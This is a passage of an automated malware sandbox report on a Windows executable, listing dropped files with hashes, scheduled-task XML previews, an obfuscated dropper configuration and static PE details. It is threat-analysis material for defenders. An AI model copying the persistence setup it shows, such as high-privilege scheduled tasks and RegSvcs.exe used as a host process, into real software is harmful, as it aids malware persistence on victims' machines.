        Size (bytes):551
        Entropy (8bit):5.401172365993664
        Encrypted:false
        SSDEEP:12:43hqymOySBOJcbJKrD0qloPjd/0Zi7Wrhu5ZoJoQeETVMx:4INOXBOJcbJe0quPxsZMouXNEZMx
        MD5:0DE8FCFC411FF1F85AC8EF2FE25B2F58
        SHA1:1B7181B6451FBABC502369B9532E8CB16AC58540
        SHA-256:899444AB8E592CD0D5C8BC9051E4B45BA02FE317FA78512FA2531A8B8C655A8D
        SHA-512:F1CFADDC269703C88A258ACE052683D29A5C90335FBBA95F563FDD872C3BCE0CF973945C077F51DC83C885A24FD16A380E657CFA608E6D784DFDB5D30430D033
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\lmaqspuvfs.txt
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):575
        Entropy (8bit):5.478714072804598
        Encrypted:false
        SSDEEP:12:Q2PLglmEyURredpVS8kyCUrXYQ/xXaCGUPN/mD5n0qs0S78f0RaR:Q+gxrgVMSXYS5GXTRSJy
        MD5:2BCB8D5803ACD40E750A3EACE6FFF142
        SHA1:B9B7AAFD67D2E7F7172525D00C387F745EC5718B
        SHA-256:5FCA30CF19F3F3C6A69FFA2F61C8101E883B450731748AFAF82C8ACC7B629A70
        SHA-512:5325C49DB64ED84A27DC93CE737F2DF8A52AE5AC7D473205D1864DEE0524F1674C77A21F85A631566399C5714C35DADBF65F7553C8EB673572E8A1372055E58C
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\mbchmfnast.lfh
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with very long lines, with no line terminators
        Category:dropped
        Size (bytes):430098
        Entropy (8bit):4.000008896555934
        Encrypted:false
        SSDEEP:6144:XtApp0ELYvuadbIZLjE5rfqN6CtwJYlF2b7SOXssuseskMe8:XtApBcvuCbIxaWN6CFIhcXsre8
        MD5:FE4F919F7FD004D0D1C5C89BCF638D11
        SHA1:11AF89C8ED4069E553FA20F204D1C8C78C60505F
        SHA-256:BF5E0A807796017B22886D1C734D579DC22CDD47A2A26560960908BB05BAA6B8
        SHA-512:87CB95067DA0E57DEA4E853E3BB23AD7DF79489A570C0182271461FF7512BA889497A756F6B1DF33561BEC569AD6D7AA171BB8E2FD7940A21470960C84265B49
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\mirwsqtlk.dat
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):505
        Entropy (8bit):5.519787882016756
        Encrypted:false
        SSDEEP:12:6yKcEjor7VW5bFYovesJt9YdBCwr1rdVKo9ZQ+nAuJf:PworMFYovTtaBHrhdVKGNnAuB
        MD5:8CC56D133A86B8D76CD01C98D1FA3A93
        SHA1:30122115E8C39A622CAFFCD2F5C22F5F824CC60F
        SHA-256:7B51963066C3E05A695E929E5B128BC9A08F1819C775FF55BD60278C6189EB25
        SHA-512:DDA706FF378A7A5F51ACCF33C5FADB2D6E52BC885434F9E69C26B868167C40CC196DE47C95CDDF4B1E9C8AFD1696CAE5FF287275CFDA48E483A53C7093134253
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\msowiig.bin
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):619
        Entropy (8bit):5.492545476252811
        Encrypted:false
        SSDEEP:12:G4RShxcOTwcG24qT3Xrz/ysneuE0X6RZaMDAg7VLBkL1zPN830djQWINJ4:GgsxcOTwv24qT3XnllslFnkL1D63qjew
        MD5:D4B853315AA3430917FFE7B653D81946
        SHA1:2494B995CE6B89E533CB7D39EEAE2AC14257324D
        SHA-256:F8B28942BA82E32A875FF7974006932286F5FE1CBDF860423090EF257E0D0D06
        SHA-512:0E30D3A44668287A1449FAA5FE6E64E819A2CAD14B825252CF13B30E44D8174128F29740E21D9CC937FAA781B474C8B739373A5C763EE5C42E0B0AD1A46FF54C
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\oaeobeseul.bmp
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):526
        Entropy (8bit):5.470896728928171
        Encrypted:false
        SSDEEP:12:jY1q0ykCR66FNR9hBif9fYNcjGY2ohQsQ80SSh2n95DRUUW62l:rwJ6p9hBi2NSUoqs2SShKZwl
        MD5:4B682E2CFE8733C3FBC05909A49EB6F9
        SHA1:13C089692ADD164CD19BB3E6503ACE3CE62A240C
        SHA-256:8D878D2A5CE42C36802B75F854156A6885677F2970B8ED61AB3593013EAB3B83
        SHA-512:C62F9BBB28056F391FC735A691C130AEBEDC2D0E977B9454237CAF5D8468A6B07C218BE32783E00C9E526A15AE08FB0ACF0BD8DBC7F69151582D0CF49014EB51
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\oeobxhkbe.xls
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):542
        Entropy (8bit):5.43675555101191
        Encrypted:false
        SSDEEP:12:0VE7CIEcVHdUb8rmhaUMixFfbkNTAbyecENQQxTrHLf2Fg:0VmVCcm88cvdQxqFg
        MD5:A412CE7422B902168C9D9D0069B2BD73
        SHA1:5ACE613E2FE2D8DE9A78825ACA7EF6C8DB271885
        SHA-256:63F1F9AA632314FE0177F06317530365AACAF728C21DC03A208E1109B5784E1D
        SHA-512:42A9CE52EED8DA9E756FEA877C25F70D4CB92E5B9B13FFF7D15446A0AE68381E25B8E1FBB022701CFEDFB100F8045FA584E851D6DEE32E9AA7219140BEB450F1
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\omrq.cpl
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):518
        Entropy (8bit):5.498311572387548
        Encrypted:false
        SSDEEP:12:xFFdWUIP+oniolYaDrJTCzj/cb4yvcnN0IxtXhelY2EaGiZ:xFFYJT2CJTCzj/biwtxtYlYaZ
        MD5:A0421E014197E3AB334AC3588A5E91A1
        SHA1:BAF987222C5925251A6567528E797FD63CAB3A92
        SHA-256:D27CDAFD99E19C474BC1BFC89334DD828C9089E44B0D3E043D3F0EAF2950F6EC
        SHA-512:411C0994EDEE07DF1F3140F85504C4F08534D41C3B6DF1502732491CBD5931D7597A7B08072986D6E5709B0817FF3384FB0E71F684274244875A6B1B46A122C2
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\psrsdcrs.ppt
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):535
        Entropy (8bit):5.460228697655972
        Encrypted:false
        SSDEEP:12:qmPLn4doIG2hU8Q9O1gOT98GsoYE3WMIvteVVx2i8:qmiG2Cn9O1gOTyQYIs+m
        MD5:06617F07B96ACD92F7B97E6968FE12C1
        SHA1:A5651BBA9A8F5B7BF7BBD579E5CAA790C81518FD
        SHA-256:D9CF772CBDB83A3DBA9EE767AC14BF1CCFE30FFFD41121EBB01C6D4D4799F792
        SHA-512:A4137B9F09A467218388A7272859B438B45C65BC3DA9DDDBB2FD5822DFA676C567C5ED3D4F30F6F334DB9578B8D8EE8CCA9E2405485D941CBB0242AD2BAAB599
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\rlller.xml
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):532
        Entropy (8bit):5.494842699274943
        Encrypted:false
        SSDEEP:12:Ih0PfU2+AQOW9QR3wU4uWavcRAI/7umzYVxBmUXOuC:FtQ59Q4HaIAczYVxBZC
        MD5:03818248A8B6BAAB709E4957BE26D1A6
        SHA1:77221C21787284A0891AAD0F918046E6EA8D209E
        SHA-256:D6825227D0376E6F9704C6213D61B3E324473CBB44987CEBB645D7458D8A1322
        SHA-512:C74D82DE930B544C9E1D6C51CF6C56FE3640D23C1C39B0A6FF4F0924EA905A093C85943C6002454558CB43E76558CE5773375D124809B62C39D2BDEC1B7C35C0
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\tcodw.xls
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):595
        Entropy (8bit):5.491533496757466
        Encrypted:false
        SSDEEP:12:UJhER91CU87mCTa/V0TDZ0vOjWrMNltukGSAtP6gv5xLTsyaUt:ChI1C75TBefMNltbUTvvLTXa8
        MD5:026F110A0C817D206247DAABE85734B6
        SHA1:F7A4A3054513E2BC1E3DE9F4AD628E642BD0965E
        SHA-256:478020C98C3533DDBE747DC2285F4B9743BC5C3476C53D28CBC1E10A861CCD71
        SHA-512:E5A65B33A297B5C58226E0DFEF7B30E3A4F440BAE0FADB7EECADC968B3CCECB3D26A7F43208BAC1AFCFCA5F9F775A855EA677EC87516FC378F6B363006C2BDCC
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\tstvjpwaw.ico
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):522
        Entropy (8bit):5.487676269826994
        Encrypted:false
        SSDEEP:12:3VuARexgiBiiM1Yc1NUAgaJRXYcLS184svKxiXkHFymlE4X:jReWiBiimy+zYd1EUdX
        MD5:7E48DF6BAA951ECAE39B524CF001FCCA
        SHA1:454836998D2510CF79377EA16077922CC5AB2C13
        SHA-256:6AA7A35C0628AAFB3851BE715525F94323972C5B468E70FA9E77C98A17893ED1
        SHA-512:F56C16D18C3B9FB9F7F2421E66103E1D7A901F1C9160480C732AA303A29F71CE040B0A90DDEDAD68F210FC9A2ABF50CE9A4AF15112796D73EA97817A1984712E
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\txoxpdjc.qnr
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:data
        Category:dropped
        Size (bytes):96502020
        Entropy (8bit):7.090532095529658
        Encrypted:false
        SSDEEP:98304:mnLDOE6//KHPJqqs2C7sIJ1+UdhsPQ36hX7jWcW3b3Mr0O1dElqhA1GJNkAL84Oh:3
        MD5:A6B5973B2AB8621E18DE5325194D4217
        SHA1:AE4F38F9D99FE7CAA0DFD1A8C20F9A8645C1AD19
        SHA-256:9F205B1613138A4CEB7942223C7654D575062ECB54D3CF54CDF1BB3E56BC2A6E
        SHA-512:938CD33CDC47F8BF9E588C9C2D4D9DF17C3866D69CD44527F08003CC1F50A96BDDDE7AD268D4FF3B5CDDEBAEAC44C9A888433172D5747B3AB419283D57414BE6
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\vdxnbnfvi.pdf
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):571
        Entropy (8bit):5.496370279162565
        Encrypted:false
        SSDEEP:
        MD5:F35202D8C9FD1328ACF1397B5D6E9BF8
        SHA1:8F86894D08EF2AF26E3A3B4EAD2FBB4135FFB2AB
        SHA-256:5E088E5B883EB50CF8BB1820B6003D8B82DA35969DEB5A9BA8F606AB1E5F6DF6
        SHA-512:3C53300A425281738AEB6DF03D6B20E59A7BBF10B7695D8A8B2C91F9FA428D48F874DA546E9D78F65D55CD0ACE5E6225F00DDBD7A993FACD2131F6F9391513C7
        Malicious:false
        Reputation:unknown
        C:\Users\user\77066510\xfjtfdxub.cpl
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):546
        Entropy (8bit):5.4988646271397466
        Encrypted:false
        SSDEEP:
        MD5:F04CA2A967FC764A36FAA9308CF33F48
        SHA1:A5C2DDB13912B1C5EF46B0BDDA7CC76031377CC9
        SHA-256:9343D1C8FF4B8D5D2B9FDA129AC44AA61F7B07BC5681C68088B997EDE440CFEA
        SHA-512:7B324450F41166AB33C26466DC8BFBAD1C84AE8B66CE38FF8C37ABD365A083738B3E8E9D1E5F05D68514B071321B29D45ED6E7D2009D4B13EF27F7876E937D0C
        Malicious:false
        Reputation:unknown
        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):142
        Entropy (8bit):5.090621108356562
        Encrypted:false
        SSDEEP:
        MD5:8C0458BB9EA02D50565175E38D577E35
        SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
        SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
        SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
        Malicious:false
        Reputation:unknown
        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
        Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        File Type:ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):142
        Entropy (8bit):5.090621108356562
        Encrypted:false
        SSDEEP:
        MD5:8C0458BB9EA02D50565175E38D577E35
        SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
        SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
        SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
        Malicious:false
        Reputation:unknown
        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
        C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):1320
        Entropy (8bit):5.135668813522653
        Encrypted:false
        SSDEEP:
        MD5:8CAD1B41587CED0F1E74396794F31D58
        SHA1:11054BF74FCF5E8E412768035E4DAE43AA7B710F
        SHA-256:3086D914F6B23268F8A12CB1A05516CD5465C2577E1D1E449F1B45C8E5E8F83C
        SHA-512:99C2EF89029DE51A866DF932841684B7FC912DF21E10E2DD0D09E400203BBDC6CBA6319A31780B7BF8B286D2CEA8EA3FC7D084348BF2F002AB4F5A34218CCBEF
        Malicious:true
        Reputation:unknown
        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
        C:\Users\user\AppData\Local\Temp\tmp2720.tmp
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):1310
        Entropy (8bit):5.109425792877704
        Encrypted:false
        SSDEEP:
        MD5:5C2F41CFC6F988C859DA7D727AC2B62A
        SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
        SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
        SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
        Malicious:false
        Reputation:unknown
        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:Non-ISO extended-ASCII text, with no line terminators
        Category:dropped
        Size (bytes):8
        Entropy (8bit):3.0
        Encrypted:false
        SSDEEP:
        MD5:F6112EADAC856DAAE9732D589993F43F
        SHA1:0DE653A9EA324DC51954C5FA1E58331AC7B8038C
        SHA-256:AD578EF8FC5B61D19BB496C0720C05E1FEF5D5B5EA8EBC40390D3D4C336DC4F8
        SHA-512:184F1EDB675AE8829090176439A63AA69E9CCF1B7040BD23938EFD3C6245C5DDAF019442F8D567E71CB4D9BB5E50DE74E0536121817E36C0C2E7D7670D8C6CAF
        Malicious:true
        Reputation:unknown
        Preview: .s.5A..H
        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):57
        Entropy (8bit):4.830795005765378
        Encrypted:false
        SSDEEP:
        MD5:08E799E8E9B4FDA648F2500A40A11933
        SHA1:AC76B5E20DED247803448A2F586731ED7D84B9F3
        SHA-256:D46E34924067EB071D1F031C0BC015F4B711EDCE64D8AE00F24F29E73ECB71DB
        SHA-512:5C5701A86156D573BE274E73615FD6236AC89630714863A4CB2639EEC8EC1BE746839EBF8A9AEBA0A9BE326AF6FA02D8F9BD7A93D3FFB139BADE945572DF5FE9
        Malicious:false
        Reputation:unknown
        Preview: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        C:\Users\user\temp\hrennftnds.cpl
        Process:C:\Users\user\77066510\cjlaro.pif
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):82
        Entropy (8bit):5.0087305542018905
        Encrypted:false
        SSDEEP:
        MD5:EC8A6D0D840B97981D8DA9935499D168
        SHA1:002DCDC5B737749AEAC14B1B1F50DC83B05429AA
        SHA-256:2A33D572C8D852E5B135B7AC9F521FCF1E8CA030DEAF672594C180A7845017FC
        SHA-512:17D47FA260D6C06B9106EEDD92759B99DDFB3DF417D070B9BC28CB84FCCB69F258B350C5249D428595057AED972588D29558606B9611D43319B97736015E2201
        Malicious:false
        Reputation:unknown
        Preview: [S3tt!ng]..stpth=%userprofile%..Key=Chrome..Dir3ctory=77066510..ExE_c=cjlaro.pif..
        \Device\ConDrv
        Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:dropped
        Size (bytes):215
        Entropy (8bit):4.911407397013505
        Encrypted:false
        SSDEEP:
        MD5:623152A30E4F18810EB8E046163DB399
        SHA1:5D640A976A0544E2DDA22E9DF362F455A05CFF2A
        SHA-256:4CA51BAF6F994B93FE9E1FDA754A4AE74277360C750C04B630DA3DEC33E65FEA
        SHA-512:1AD53476A05769502FF0BCA9E042273237804B63873B0D5E0613936B91766A444FCA600FD68AFB1EF2EA2973242CF1A0FF617522D719F2FA63DF074E118F370B
        Malicious:false
        Reputation:unknown
        Preview: Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved......The following installation error occurred:..1: Assembly not found: '0'...

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.823508667946661
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:dUzAkYsvl8.exe
        File size:1021780
        MD5:9a4a8643db95a8c0fe52af8675a5d1b1
        SHA1:c6beb75cbc168f9224ace74c0dcfb29df6197e82
        SHA256:b4e2d864ec03943310548bfbc963a0848bd08e088429c5ce05759face5d380d2
        SHA512:05d404c9422c2da367135f616a8b61b6adc68dc3f8f0b3a070f2071ec01de8c2aeafe5a63aea6e306fdfd299c43ef792efcfd9b555dcda9b3ff9e44872a8b4c0
        SSDEEP:24576:rAOcZEh5lwWkAZ5HrNUWTq6ai0bagi7vzJV:tWWbL1Tq6d4a5vT

        File Icon

        Icon Hash:b491b4ecd336fb5b

        Static PE Info

        General

        Entrypoint:0x41e1f9
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Time Stamp:0x5E7C7DC7 [Thu Mar 26 10:02:47 2020 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:5
        OS Version Minor:1
        File Version Major:5
        File Version Minor:1
        Subsystem Version Major:5
        Subsystem Version Minor:1
        Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

        Entrypoint Preview

        Instruction
        call 00007F5150A9319Fh
        jmp 00007F5150A92B93h
        cmp ecx, dword ptr [0043D668h]
        jne 00007F5150A92D05h
        ret
        jmp 00007F5150A93315h
        ret
        and dword ptr [ecx+04h], 00000000h
        mov eax, ecx
        and dword ptr [ecx+08h], 00000000h
        mov dword ptr [ecx+04h], 00433068h
        mov dword ptr [ecx], 00434284h
        ret
        push ebp
        mov ebp, esp
        push esi
        push dword ptr [ebp+08h]
        mov esi, ecx
        call 00007F5150A86111h
        mov dword ptr [esi], 00434290h
        mov eax, esi
        pop esi
        pop ebp
        retn 0004h
        and dword ptr [ecx+04h], 00000000h
        mov eax, ecx
        and dword ptr [ecx+08h], 00000000h
        mov dword ptr [ecx+04h], 00434298h
        mov dword ptr [ecx], 00434290h
        ret
        lea eax, dword ptr [ecx+04h]
        mov dword ptr [ecx], 00434278h
        push eax
        call 00007F5150A95EADh
        pop ecx
        ret
        push ebp
        mov ebp, esp
        push esi
        mov esi, ecx
        lea eax, dword ptr [esi+04h]
        mov dword ptr [esi], 00434278h
        push eax
        call 00007F5150A95E96h
        test byte ptr [ebp+08h], 00000001h
        pop ecx
        je 00007F5150A92D0Ch
        push 0000000Ch
        push esi
        call 00007F5150A922CFh
        pop ecx
        pop ecx
        mov eax, esi
        pop esi
        pop ebp
        retn 0004h
        push ebp
        mov ebp, esp
        sub esp, 0Ch
        lea ecx, dword ptr [ebp-0Ch]
        call 00007F5150A92C6Eh
        push 0043A410h
        lea eax, dword ptr [ebp-0Ch]
        push eax
        call 00007F5150A95595h
        int3
        push ebp
        mov ebp, esp
        sub esp, 0Ch

        Rich Headers

        Programming Language:
        • [ C ] VS2008 SP1 build 30729
        • [EXP] VS2015 UPD3.1 build 24215
        • [LNK] VS2015 UPD3.1 build 24215
        • [IMP] VS2008 SP1 build 30729
        • [C++] VS2015 UPD3.1 build 24215
        • [RES] VS2015 UPD3 build 24213

        Data Directories

        Name | Virtual Address | Virtual Size | Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3b540 | 0x34 | .rdata
        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3b574 | 0x3c | .rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x4c28 | .rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x67000 | 0x210c | .reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x397d0 | 0x54 | .rdata
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x34218 | 0x40 | .rdata
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IAT | 0x32000 | 0x260 | .rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3aaec | 0x120 | .rdata
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

        Sections

        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
        .text | 0x1000 | 0x30581 | 0x30600 | False | 0.589268410853 | data | 6.70021125825 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        .rdata | 0x32000 | 0xa332 | 0xa400 | False | 0.455030487805 | data | 5.23888424127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data | 0x3d000 | 0x238b0 | 0x1200 | False | 0.368272569444 | data | 3.83993526939 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
        .gfids | 0x61000 | 0xe8 | 0x200 | False | 0.333984375 | data | 2.12166381533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .rsrc | 0x62000 | 0x4c28 | 0x4e00 | False | 0.602263621795 | data | 6.36874241417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc | 0x67000 | 0x210c | 0x2200 | False | 0.786534926471 | data | 6.61038519378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

        Resources

        Name | RVA | Size | Type | Language | Country
        PNG | 0x62524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States
        PNG | 0x6306c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States
        RT_ICON | 0x64618 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 134243974, next used block 1626799870 | |
        RT_DIALOG | 0x64900 | 0x286 | data | English | United States
        RT_DIALOG | 0x64b88 | 0x13a | data | English | United States
        RT_DIALOG | 0x64cc4 | 0xec | data | English | United States
        RT_DIALOG | 0x64db0 | 0x12e | data | English | United States
        RT_DIALOG | 0x64ee0 | 0x338 | data | English | United States
        RT_DIALOG | 0x65218 | 0x252 | data | English | United States
        RT_STRING | 0x6546c | 0x1e2 | data | English | United States
        RT_STRING | 0x65650 | 0x1cc | data | English | United States
        RT_STRING | 0x6581c | 0x1b8 | data | English | United States
        RT_STRING | 0x659d4 | 0x146 | Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500 | English | United States
        RT_STRING | 0x65b1c | 0x446 | data | English | United States
        RT_STRING | 0x65f64 | 0x166 | data | English | United States
        RT_STRING | 0x660cc | 0x152 | data | English | United States
        RT_STRING | 0x66220 | 0x10a | data | English | United States
        RT_STRING | 0x6632c | 0xbc | data | English | United States
        RT_STRING | 0x663e8 | 0xd6 | data | English | United States
        RT_GROUP_ICON | 0x664c0 | 0x14 | data | |
        RT_MANIFEST | 0x664d4 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States

        Imports

        DLL | Import
